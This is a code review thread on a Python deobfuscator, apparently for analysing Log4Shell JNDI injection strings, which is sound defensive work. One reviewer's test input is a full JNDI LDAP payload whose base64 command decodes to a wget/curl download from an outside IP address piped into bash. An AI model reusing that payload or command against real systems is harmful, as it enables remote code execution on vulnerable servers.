lib/deobfuscate.py

```diff
@@ -7,6 +10,20 @@
 DEFAULT_MAX_DEPTH = 150
 
 
+def parse_base64_payload(payload: str) -> str:
+    if -1 == payload.find(r"Command/Base64/"):
+        return payload
+
+    logger.debug(f"Base64 command has been identify")
+    payload_without_base64, base64_command = payload.split(r"Command/Base64/")
```

Comment:
The split command will also append the trailing `}` into the `base64_command` string. Consider a different method of splitting

Reply:
I considered using the `payload.removesuffix` and `payload.removeprefix` functions, but it is only available from  Python Versions >= 3.9.
I will add rfind to the split function

Reply:
I think the current method of getting the path component of the URL is problematic. I would suggest extracting the URL part of the tag, parsing it as it were a URL, and finally getting the path component. This way we don't have to do the heavy lifting of parsing the URL ourselves.

I added a code snippet that illustrates how I see best the solution for this: 
```python
import binascii
import re
from typing import Optional, List
from urllib.parse import urlparse
import base64

from logging import getLogger
logger = getLogger("Ox4Shell")

# Extracts the an JNDI Log4j tag content from a tag with the form of:
# ${jndi:ldap://<CONTENT>}
INTERNAL_TAG_REGEX = re.compile(r"\$\{jndi:ldap://(.*?)(?:\:\-.*?)?\}")

# Extracts the command content from the full path
EXTRACT_COMMAND_REGEX = re.compile(r"\/Basic\/Command\/Base64\/(.*?)$")


def safe_b64_decode(string: str) -> Optional[str]:
    try:
        return base64.b64decode(string, validate=True).decode()
    except binascii.Error:
        logger.debug(f"Failed base64 decoding {string=}")
        return None


def base64_decode_payload(payload: str) -> str:
    tags: List[str] = INTERNAL_TAG_REGEX.findall(payload)

    if not tags:
        logger.debug(f"Can't find proper tags within the {payload=}")
        return payload

    path = urlparse(tags[0]).path
    commands: List[str] = EXTRACT_COMMAND_REGEX.findall(path)

    if not commands:
        logger.debug(f"can't find commands within the {path=}")
        return payload

    command = commands[0]
    decoded = safe_b64_decode(command)

    if not decoded:
        logger.debug(f"Can't decode command {command=}")
        return payload

    changed_payload = payload.replace(command, decoded)
    return changed_payload


x = base64_decode_payload("${jndi:ldap://lala.com:1389/Basic/Command/Base64"
                          "/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNT"
                          "AuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==#lala:-lala}")
print(x)
```

Reply:
Also, the `INTERNAL_TAG_REGEX` regex could apply to more `jndi` providers (such as `dns`) by generalizing the regex:

```python
# Extracts the an JNDI Log4j tag content from a tag with the form of:
# ${jndi:ldap://<CONTENT>}
INTERNAL_TAG_REGEX = re.compile(r"\$\{jndi:(?:.+?)://(.*?)(?:\:\-.*?)?\}")
```

Reply:
I like the safe function and the use of regex. 
I changed the code. Now it uses `re.sub`, what do you think?

Reply:
Please pay attention to the flow I suggested, especially the URL parsing part. We should consider the connection string as a URL, since it may contain characters we can't decode. 

For example, if the attacker used the fragment part of the URL, your regex would catch that as well and would fail to decode it (I attached a concrete example in the comment above).

Reply:
Sorry for the delay in my reply. I changed as you suggested.